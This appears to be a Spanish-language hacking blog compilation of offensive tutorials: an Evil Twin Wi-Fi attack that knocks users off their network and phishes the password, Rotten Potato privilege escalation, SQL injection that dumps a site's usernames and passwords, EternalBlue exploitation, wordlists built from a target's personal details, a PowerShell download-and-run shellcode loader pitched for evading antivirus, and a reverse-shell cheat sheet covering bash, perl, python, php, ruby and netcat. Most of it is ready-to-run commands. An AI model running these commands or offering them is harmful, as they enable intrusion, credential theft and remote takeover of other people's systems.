Pentesting ,Hacking y Seguridad informatica

Hackeando redes WPA2

Existen múltiples métodos de lograr comprometer una red Wireless, en este caso de estudio vamos a ejecutar un ataque de Evil Twin para comprometer dispositivos.

Hackeando redes WPA2 utilizando ataque de Evil Twin

1 – Primero, vamos descargar e repositorio de Fluxión que está disponible en open Source, seguido de esto nos dirigimos la carpeta que contiene los documentos descargados.

git clone https://github.com/wi-fi-analyzer/fluxion.git

2 – Nos aparecen los términos de uso de la herramienta fluxión los cuales indican que la herramienta debe ser utilizada únicamente para propósitos educativos y no debe ser utilizada para propósitos ilegales.

3 – Ahora podremos elegir el idioma de la plataforma, esto nos permite seleccionar el lenguaje de nuestra lengua nativa.

4 – Elegimos el canal correspondiente, en caso de que se desconozca el canal se recomienda seleccionar la opción de todos los canales para identificar las redes dentro del alcance

5 – Se iniciara un Wi-Fi monitor el cual nos permite escanear las redes en la frecuencia disponible, en este caso podemos ver información básica de las señales a las cuales tenemos acceso.

6 – Después de realizar el escaneo podemos identificar datos tales como los canales en los que están configurados en el dispositivo, también la intensidad de la señal y la dirección MAC.

7 – Ahora tenemos las diferentes opciones de ejecutar el ataque, en este caso vamos a ejecutar la opción 2 que consta del despliegue de un FakeAP.

8 – Nos solicitara el handshake en caso de tener posteriormente la captura del hash generado por el AP, esto se utiliza cuando se debe realizar un ataque persistente.

9 –  Ahora nos solicitara el método con el cual queremos realizar el chequeo del handshake, en este caso vamos a seleccionar el método 2.

10 – Para poder capturar el Handshake de la red se debe realizar una denegación de servicio de todos los usuarios conectados a esa red objetivo.

11 – Podemos ver el comportamiento en el celular, en el cual actualmente estamos conectados a la red de la familia campos sin problema alguno.

12 – En este punto iniciara nuestro ataque lo cual desconectara a cualquier persona conectada a este dispositivo y por más que intente reiniciar inclusive el dispositivo no se podrá conectar.

13 – Nos solicitara la opción de utilizar un certificado SSL, sin embargo para este ejercicio vamos a seleccionar crear uno nuevo

14 – Seleccionamos la opción de ataque que queremos desplegar en este caso vamos a utilizar la interfaz web para poder obtener el handshake.

15 – Seleccionamos la página que se utilizara como login en el dispositivo, en este caso será la opción 5 que corresponde a un índex diseñado en español.

16 – Se genera el AP falso, con el cual combinado a la desconexión del Router original no podremos acceder a este dispositivo y nos solicitara el acceso nuevamente.

17 – Nos solicita el acceso a Wifi desde el dispositivo, el cual es nuestro objetivo principal.

18 – Estando conectados a nuestra red maligna nos solicitara el dispositivo acceso del dispositivo, únicamente indicando que por razones de seguridad se debe introducir la contraseña del dispositivo.

19 – Después de efectuado este proceso el fake ap se deshabilitara automáticamente y permitirá al usuario navegar con total normalidad.

NOTA: La reproducción de este ataque se realizó en un ambiente controlado y no se pretende incentivar la replicación de este tipo de ataques, ningún dato expuesto en este documento pretende ser del tipo personal y la preparación del laboratorio se realizó con la adecuada preparación.

 

Escalar privilegios con Rotten Potato en entornos Windows

Cuando se logra acceder al sistema el siguiente objetivo es escalar privilegios para comprometer la totalidad del sistema convirtiéndose en una tarea complicada.

Escalar privilegios con Rotten Potato en entornos Windows

Obteniendo rol administrador en una shell con privilegios limitados

1 – Para este ejemplo tenemos una maquina con windows 10 con un shell limitada, primero evidenciamos que el usuario que este activo la shell.

getuid

2 – Evidenciamos que los permisos que tiene el usuario actual son limitados y restringen la ejecución de comandos

getprivs

3 – Intentamos elevar los privilegios con el confiable “getsystem” en el meterpreter (en este caso no resulta exitoso).

getsystem

4 –  Descargamos nuestro exploit desde github para proceder a cargarlo en nuestra maquina comprometida

git clone https://github.com/foxglovesec/RottenPotato.git

5 –  Buscamos en el directorio que recién descargamos, nuestro exploit estará como “rottenpotato.exe”

cd RottenPotato
ls

6 – Nos ubicamos en un directorio en el cual tengamos permisos de escritura en este caso lo subiremos a Public

cd C:\\Users\\Public
pwd

7 –  Ejecutamos la subida del archivo, podemos subirlo de diferentes maneras (FTP o Share) en este caso con upload del meterpreter basta

upload /root/RottenPotato/rottenpotato.exe

8- Primero debemos cargar el modulo incógnito para la impersonalizaron de tokens

use incognito

9 –  Ahora identificamos los tokens que tiene disponible el usuario que tenemos comprometido actualmente, en este caso no tenemos ninguno

list_tokens -u

10 – Ejecutamos nuestra papa podrida para que la magia suceda

execute -Hc -f ./rottenpotato.exe

11 – Después de ejecutado, volvemos a verificar los tokens que tenemos a nuestro alcance

list_tokens -u

12 – Ahora que tenemos el token disponible procedemos a personificar a el administrador del sistema

impersonate_token "NT AUTHORITY\\SYSTEM"

13 – Magia! por ultimo nos queda verificar el usuario activo en la sesión que tenemos abierta.

 

Así de útil puede ser este método para escalar privilegios en Windows, Recuerda utilizar esta información sabiamente.

Gracias a los grandes Stephen Breen y Chris Mallz nos facilitaran las cosas en la fase de post-explotacion!.

Fuente Original: Fox Love Security

saludos!

0x00Sector!!

Análisis de Vulnerabilidades Web

Auditando aplicaciones web con SkipFish

Sin duda la mejor auditoria web que se puede realizar es de manera manual, analizando los comportamientos básicos de la aplicación y entendiendo su flujo de trabajo para encontrar brechas de seguridad, sin embargo el esfuerzo y las experiencia para conseguir éxito en este tipo de auditorias es bastante relativo por eso nos podemos apoyar con el uso de herramientas que evalúan los parámetros mas básicos de las aplicaciones web y obteniendo un vector de ataque.

Auditando con Skipfish

1 – Kali Linux tiene por defecto en su arsenal de herramientas Skipfish :

skipfish -h

Auditando aplicaciones web con SkipFish

2 – Ejecutamos el skipfish primero con el parámetro donde se exportara el informe y el segundo con la url que queremos auditar que en este caso es la aplicación dispuesta por acunetix para realizar pruebas.

skipfish -o /root/Desktop/VulnWeb http://testphp.vulnweb.com/

Auditando aplicaciones web con SkipFish

3 – Nos aparece un mensaje con algunos consejos útiles para el uso de la aplicación, esperamos 60 segundos o presionamos alguna tecla para continuar.

Auditando aplicaciones web con SkipFish

4 – Inicia la magia!, recuerda que el tiempo de duración varia según lo robusto del aplicativo .

Auditando aplicaciones web con SkipFish

5 –  Cuando se complete la auditoria nos indicara la ruta donde se almaceno el informe correspondiente.

Auditando aplicaciones web con SkipFish

6 – Abrimos el la ruta donde generamos el informe y abrimos el archivo “index.html”.

Auditando aplicaciones web con SkipFish

7 – Ahora que tenemos el informe solamente hace falta comprobar las vulnerabilidades detectadas para descartar falsos positivos.

Auditando aplicaciones web con SkipFish

Auditando aplicaciones web con SkipFish

8 – Encontramos una vulnerabilidad de RFI(Remote File Inclusion) vamos a explotarla!.

Auditando aplicaciones web con SkipFish

9 – Podemos incluir archivos mediante la url, en este caso buscamos una imagen en Internet y le cambiamos el parámetro.

Auditando aplicaciones web con SkipFish

Recuerda que no debes analizar aplicación si en correspondiente consentimiento del propietario de lo contrario es considerado un delito, este tutorial es meramente con propositos educativos y busca ayudar a fortalecer la seguridad de las aplicaciones web.

Saludos!

0x00Sector!!

Esteganografía: Ocultando información en archivos de audio

Como si de una serie de ciencia ficción se tratase, es posible ocultar información en pistas de audio para pasar desapercibido dicho contenido en lo personal encuentro muy útil esta técnica de esteganografia porque ademas de añadir una capa de seguridad adicional a la información que buscamos proteger también nos conecta con algo tan característico y personal que resulta bastante sencillo de recordar.

ocultar-archivos-en-audio

sin mas preámbulos vamos a la parte interesante de todo esto, recuerda que nuestro objetivo siempre sera preservar la integridad de la información.

Fase 1: Preparando nuestro entorno

 

1 – Vamos a descargar “DeepSound” de la pagina oficial del siguiente LINK

ocultar-archivos-en-audio

2 – Buscamos en las descargas nuestro archivo DeepSoundSetup.msi 

ocultar-archivos-en-audio

3 – Abrimos en la carpeta de descargas y ejecutamos el DeepSoundSetup.msiocultar-archivos-en-audio

4 –  Ahora tenemos que proceder con la instalación del software , damos click en next

ocultar-archivos-en-audio

5 – Aceptamos los términos de la licencia de uso y le damos click en Next.

ocultar-archivos-en-audio

6 –  La ruta de instalación por defecto sera en la carpeta de Program Files y damos click en Next

ocultar-archivos-en-audio

7 – Procedemos con la instalación de la herramienta , damos click en Install el cual se ejecutara con privilegios de administrador.

ocultar-archivos-en-audio

8 – Una vez finalizada la instalación damos por cerrado la adecuación de la herramienta.

ocultar-archivos-en-audio

Fase 2: Encriptar los documentos

 

1 – Identificamos el archivo que queremos proteger, en este caso yo voy a encriptar el documento “confidencial.txt”

ocultar-archivos-en-audio

2 –  Abrimos nuestro DeepSound instalado en la fase 1 del tutorial

ocultar-archivos-en-audio

4 – Damos click en la opción de “Open carrier files” y buscamos nuestra canción favorita.

ocultar-archivos-en-audio

5 –  Para este ejemplo voy a utilizar Kalimba como contenedor de nuestra información.

ocultar-archivos-en-audio

6 – Ahora damos click en “Add secret files” y buscamos nuestro documento, en este caso “Confidencial.txt”

ocultar-archivos-en-audio

7 –  Después de tener un contenedor y un documento que ocultar procedemos a dar click en “Encode secret files”ocultar-archivos-en-audio

8 – Le ponemos una contraseña para obtener nuestra información posteriormente, nuestra ruta por defecto sera en el escritorio.

ocultar-archivos-en-audio

9 –  Listo!! tenemos nuestra información encriptada en nuestra canción Kalimba, nadie sospecharía de esto.

ocultar-archivos-en-audio

Fase 3: Desencriptar los documentos

 

1 – Abrimos nuevamente nuestro DeepSound, damos click en la opción “Open carrier files” y seleccionamos el audio con la información, podemos ver que su tamaño aumento.ocultar-archivos-en-audio

2 – Ingresamos la contraseña para poder acceder a los documentos

ocultar-archivos-en-audio

3 –  Si la contraseña se ingresa correctamente podemos acceder a nuestro documento contenido, posterior a esto damos click en “Extract secret files”

ocultar-archivos-en-audio

4 – Perfecto! ahora podemos acceder a nuestro documento en el escritorio!

ocultar-archivos-en-audio

Interesante herramienta, ahora solo te queda pensar en los múltiples usos que le puedes dar a la esteganografia y empezar a proteger tu información!

Saludos!

0x00Sector!!

 

Diccionarios personalizados para ataques de fuerza bruta

brute force attack

Preparando nuestro diccionario personalizado para ataques de fuerza bruta

Si bien existe una gran variedad  de obtener acceso a aplicaciones,redes y/o plataformas restringidas una de las mas comunes es aprovecharnos de los descuidos de los administradores,responsables y programadores de dicho sistema, muy seguramente te encontraras en redes WiFi donde la contraseña se compone de cierto tipo de palabras y números relacionados con la compañía, en este caso vamos a generar nuestro propio directorio para ataques de fuerza bruta que permita que las posibilidades de éxito se incrementen de manera exponencial, Empecemos!!

1 – En esta ocasion vamos ver una herramienta que en lo personal me ayuda bastante cuando se realiza alguna auditoria sobre una plataforma que podamos generar un ataque de fuerza bruta, primero descargamos cupp

git clone https://github.com/Mebus/cupp

brute force attack

2 – Ingresamos a el directorio cupp

cd cupp
ls

brute force attack

 

3 – Ahora ejecutamos el código de “cupp” donde podemos identificar las opciones disponibles.

python cupp.py

brute force attack

4 –  Vamos a utilizar el método interactivo para generar nuestro diccionario personalizado.

python cupp.py -i

brute force attack

En este ejercicio vamos a utilizar datos falsos generados por una herramienta diseñada para este tipo de situaciones.

brute force attack

5 –  Diligenciamos datos básicos como nombres, fecha de nacimiento y usuario.

brute force attack

6 –  Muchas personas optan por utilizar contraseñas que estén relacionadas con temas que le sean familiares.

brute force attack

7 –  Incluimos el nombre de la mascota y en este caso el nombre de la compañía para la que trabaja.

brute force attack

8 –  Adicional podemos configurar palabras claves sobre el comportamiento que podamos identificar en el individuo sobre temas de interés.

brute force attack

9 – En unos pocos minutos podemos tener un poderoso directorio para proceder a ejecutar nuestro ataque de fuerza bruta!

brute force attack

Recuerda que la posibilidad de éxito de este tipo de ataques no esta totalmente garantizada y dependerá directamente de las nociones que tu objetivo tenga sobre el uso de contraseñas robustas, igualmente por experiencia propia me funciono muy bien esta herramienta para objetivos con un bajo conocimiento técnico.

Saludos!

0x00Sector!!

Explotando vulnerabilidades Meltdown y Spectre

El mundo tiembla ante Meltdown y Spectre

Meltdown y Spectre son dos vulnerabilidades criticas que fueron encontradas recientemente, permitiendo a los hackers robar información sensible, una de estas vulnerabilidades afecta a procesadores fabricados desde hace mas de 23 años.

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Sistemas afectados:

Hardware de CPU

Que son Meltdown y Spectre:

Meltdown es una falla de seguridad que permite a los hackers eludir la barrera de hardware entre las aplicaciones ejecutadas por los usuarios y la memoria del núcleo de la computadora.

Spectre es ligeramente diferente. Potencialmente, permite a los piratas informáticos engañar a las aplicaciones que de otro modo estarían libres de errores para obtener información secreta.

Explotación

Esta prueba de explotación se realiza con un fin educativo y se realiza bajo el siguiente procesador.

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Spectre (CVE-2017–5753 ,CVE-2017–5715)

1 – Descargamos el repositorio desde https://github.com/MangelZabala/Spectre

git clone https://github.com/MangelZabala/Spectre
cd Spectre/
ls

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

 

2 – Compilas el programa C con el siguiente comando:

gcc -std=c99 spectre.c

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

3 – Ahora ejecutamos la salida “a.out”

./a.out

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

PoC Fuentehttps://spectreattack.com/spectre.pdf

 

Meltdown (CVE-2017-5754)

 

1 – Descargamos el repositorio en github

git clone https://github.com/paboldin/meltdown-exploit
cd meltdown-exploit
ls

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

2 – Compilamos el exploit con el comando “make”

make

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

3 – ahora ejecutamos el .sh

sh run.sh

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Espero les sirva la información y la utilicen sabiamente, estas vulnerabilidades aun están en desarrollo y sus variantes pueden cambiar por lo tanto no existe una solución definitiva a los procesadores que tienen este fallo de seguridad, su recomendación es cambiar de CPU..( ͡° ͜ʖ ͡°) .

Saludos

0x00Sector!

 

 

Explotando una pagina vulnerable a SQL Injection

Explotando de manera practica una pagina vulnerable a SQL Injection manualmente

Inyección SQL

La famosa vulnerabilidad de SQL Injection nos permite inyectar consultas para acceder a información restringida y se produce cuando no se validan correctamente las entradas en el desarrollo de las aplicaciones como consecuencia podemos obtener información muy interesante. vamos a ver como identificarlo y como explotar esta vulnerabilidad, para ello vamos a utilizar el laboratorio web de acunetix que nos permite ver de una manera mas clara este tipo de Vulnerabilidades, manos a la obra!

Paso a Paso

1 – En este escenario vamos a practicar con la pagina testphp.vulnweb.com que es especificamente diseñada para entender este tipo de vulnerabilidades, en la imagen podemos observar su panel principal.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

2 – Ingresamos a el apartado de “Browse Categories” donde podemos observar el siguiente menu de Posters,Paintings,Stickers y Graffity.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

3 –  Ingresamos a la categoría de “Posters” , aparentemente  una interesante galería de imágenes con su correspondiente artista…podemos ver un identificador en el URL lo que puede estar haciendo una consulta a “algo”.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

4 – Nuestros instintos de Hacker se despiertan y comprobamos poniendo un simple ” ‘ ” a el final de la sentencia para poder detectar rápidamente que el sitio es vulnerable a SQL Injection!, en este caso podemos ver que nos indica la pagina tiene un error en la sintaxis.ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

5 –  Empezamos con un simple Union para poder inyectarle nuestra propia sentencia, nuestro objetivo es lograr encontrar la cantidad de columnas que tiene la sentencia ya dispuesta en la pagina para poder ejecutar la nuestra.ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

6 –  Lo logramos, encontramos que las columnas contenidas en la sentencia equivalen a 11.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

7 –  Utilizamos “@@version” con este comando podemos ver la versión del motor de base de datos alojado en esta web.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

8 – Ahora utilizamos “user()” para identificar el usuario con el cual se ejecutara la consulta, en este caso podemos ver que nos retorna acurat@localhost.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

9 – Ahora nos ponemos serios y recopilamos información interesante, buscamos el nombre de las tablas , encontramos algo interesante.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

10 – Encontramos Oro! columna uname y pass esto quiere decir que podremos tener un posible acceso a el portal.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

11 – Utilizamos un concat para poder ver claramente los valores de las columnas encontradas anteriormente desde la tabla users.

ficando y explotando de manera practica una pagina vulnerable a SQL Injection  manualmente

Espero les sirva la información y en caso de tener inconvenientes con algunos de estos pasos no dudes en preguntarlo.

Saludos!

0x00Sector!

Explotar Vulnerabilidad EternalBlue con Metasploit

Detectar vulnerabilidad MS17-010 EternalBlue y explotarla.

En el mes de mayo del año 2017 se detecto un Rasomware llamado WannaCry, este malware se aprovechaba de la vulnerabilidad EternalBlue para propagarse por las redes conectadas a los equipos relacionados a nivel interno, la causa de su gran impacto se debe principalmente a la existencia de esa brecha en todos los dispositivos windows y el parche no fue liberado horas después de identificar la vulnerabilidad, hoy vamos a detectar si un equipo es vulnerable y demostrar lo sencillo que es aprovecharse de esta vulnerabilidad.

1 – Procedemos a dirigirnos a la ruta donde Nmap almacena los scripts para posteriormente descargar el .nse liberado para detectar la existencia de esta vulnerabilidad.

Url Fuente: https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse

cd /usr/share/nmap/scripts && wget https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse

Explotar Vulnerabilidad EternalBlue con Metasploit

2 – Ejecutamos el Nmap invocando a el script para detectar si el objetivo en cuestión es vulnerable o no.

nmap -p445 --script smb-vuln-ms17-010 <IP>

3 – Ahora que sabemos que nuestro objetivo es vulnerable procedemos a ejecutar nuestro Metasploit para ejecutar el ataque.

msfconsole

Explotar Vulnerabilidad EternalBlue con Metasploit

4 – Buscamos el exploit de la librería de Metaspploit.

search ms17_010

Explotar Vulnerabilidad EternalBlue con Metasploit

5 – Seleccionamos el exploit a utilizar y adicional revisamos su opciones de configuración.

use auxiliary/scanner/smb/smb_ms17_010 
options

Explotar Vulnerabilidad EternalBlue con Metasploit

6 – En este caso especifico solo vamos a modificar la opción RHOST y procederemos con la explotación.

set RHOST <IP>

Explotar Vulnerabilidad EternalBlue con Metasploit

7 – Después de tener nuestras opciones definidas y todo en orden procedemos con la explotación!.

exploit

Explotar Vulnerabilidad EternalBlue con Metasploit

Explotar Vulnerabilidad EternalBlue con Metasploit

8 – Podemos ver que la explotación se realizo de manera correcta y pudimos obtener una shell en el equipo remoto pudiendo comprometer la totalidad del equipo

Explotar Vulnerabilidad EternalBlue con Metasploit

De esta manera podemos identificar el alcance que puede tener este ataque y parte de las consecuencias, la solución es tan sencilla como aplicar el parche liberado por Microsoft para cerrar esta vulnerabilidad, recuerda utilizar esta información de manera responsable, Happy Hacking.

Saludos!Social

0x00Sector!

Ataque mediante Powershell inyectando una ShellCode directamente en memoria

Inyectando una shellcode directamente en memoria mediante Powershell

Ataque mediante Powershell inyectando una ShellCode directamente en memoria

Cuando logramos ejecutar código remoto en un entorno windows podemos tener inconvenientes en cuando la generación de una shell para iniciar con la escalda de privilegios, un método muy conocido es aprovechar Powershell para inyectar una ShellCode directamente en memoria para comprometer el sistema.

1 – Descargamos Unicorn

git clone https://github.com/trustedsec/unicorn

Ataque mediante powershell injectando una shellcode directamente en memoria

2 – Accedemos a el directorio creado en la ruta actual

cd unicorn/

Ataque mediante powershell injectando una shellcode directamente en memoria

3 – Ejecutamos la instrucción para que se genere el exploit en un .txt a lo cual solo enviaremos dos parámetros la ip y el puerto del equipo que recibirá la Shell. (Recuerda remplazar inclusive los <>)

./unicorn.py windows/meterpreter/reverse_tcp <ip> <port>

Ataque mediante Powershell inyectando una ShellCode directamente en memoria

4 – Ahora procedemos a verificar que existan los archivos “unicorn.rc” y “powershell_attack.txt” en el directorio actual

ls

Inyectando una shellcode directamente en memoria mediante Powershell

5 – Ahora debemos cambiar la extensión del archivo powershell_attack.txt a exploit.html y procedemos a utilizar SimpleHTTPServer para poder alojar el exploit y descargarlo desde la maquina objetivo:

cp powershell_attack.txt exploit.html
python -m SimpleHTTPServer 1236

6 – Procedemos a abrir nuestra msfconsole con los parámetros del archivo “unicorn.rc”

msfconsole -r unicorn.rc

Ataque mediante Powershell inyectando una ShellCode directamente en memoria

 

8 – Nuestra msfconsole queda en escucha para cuando se ejecute el script en la maquina objetivo, desde el objetivo debemos ejecutar la siguiente linea de código donde interpretara y creara la inyección de shellcode

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.121:1236/exploit.html')"

cuando logremos ejecutar esta linea podremos ver que la sesión que tenemos activa en el meterpreter se abrirá una shell

Ataque mediante Powershell inyectando una ShellCode directamente en memoria

 

ahora tenemos una shell interactiva con la cual podemos proceder a subir los privilegios y comprometer totalmente la maquina, espero esta información sea de utilidad en algún momento que necesites evadir un Antivirus.

Saludos

0x00Sector!Social

Como obtener una reverse shell

Que es una Reverse Shell?

Como obtener una reverse shell

 

Cuando logramos ejecutar comandos de manera remota en un equipo nuestro objetivo principal es obtener una Reverse Shell conectándose a el equipo local mediante un puerto en escucha, posterior a esto proceder con el escalado de privilegios, a continuación una muy útil recopilación de posibles shell en diferentes lenguajes según el entorno de la maquina a la cual se ejecutara la shell

Para poder lograr la ejecucion correcta de estos comandos debes realizar los cambios de los caracteres que resalto en rojo, recuerda que debes remplazar inclusive los <>

  • ip = Ip de la maquina que recibirá la shell
  • port = puerto que esta en escucha en la maquina que recibe la shell

Entornos Unix/Linux

Bash

Detalles: Algunas versiones de Bash pueden enviarte una reverse shell

bash -i >& /dev/tcp/<ip>/<port> 0>&1

Perl

Detalles: Si el sistema objetivo tiene l Perl es posible crear una reverse shell con el siguiente comando

perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

Detalles: Esta versión solo es disponible para Python 2.7 para obtener la shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

Detalles:Si puedes ejecutar codigo remoto desde un servicio que soporte PHP es muy probable que puedas obtener la shell con el siguiente codigo

php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

Detalles: ocasionalmente si intento invocar una reverse shell con ruby genera error por lo tanto evito usarla, si te funciona buen provecho

ruby -rsocket -e'f=TCPSocket.open("<ip>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Detalles: Es muy poco común que en un entorno real nos encontremos con el servicio de netcat activo, sin embargo si logras encontrarlo puede ser muy util

nc -e /bin/sh <ip> <port>

Depende del entorno en el cual estés trabajando puedes utilizar alguno de estos códigos para obtener una reverse shell, recuerda que los resultados varían según las características.

Cordialmente

0x00Sector!

Fuente pentestmonkey

Social

Social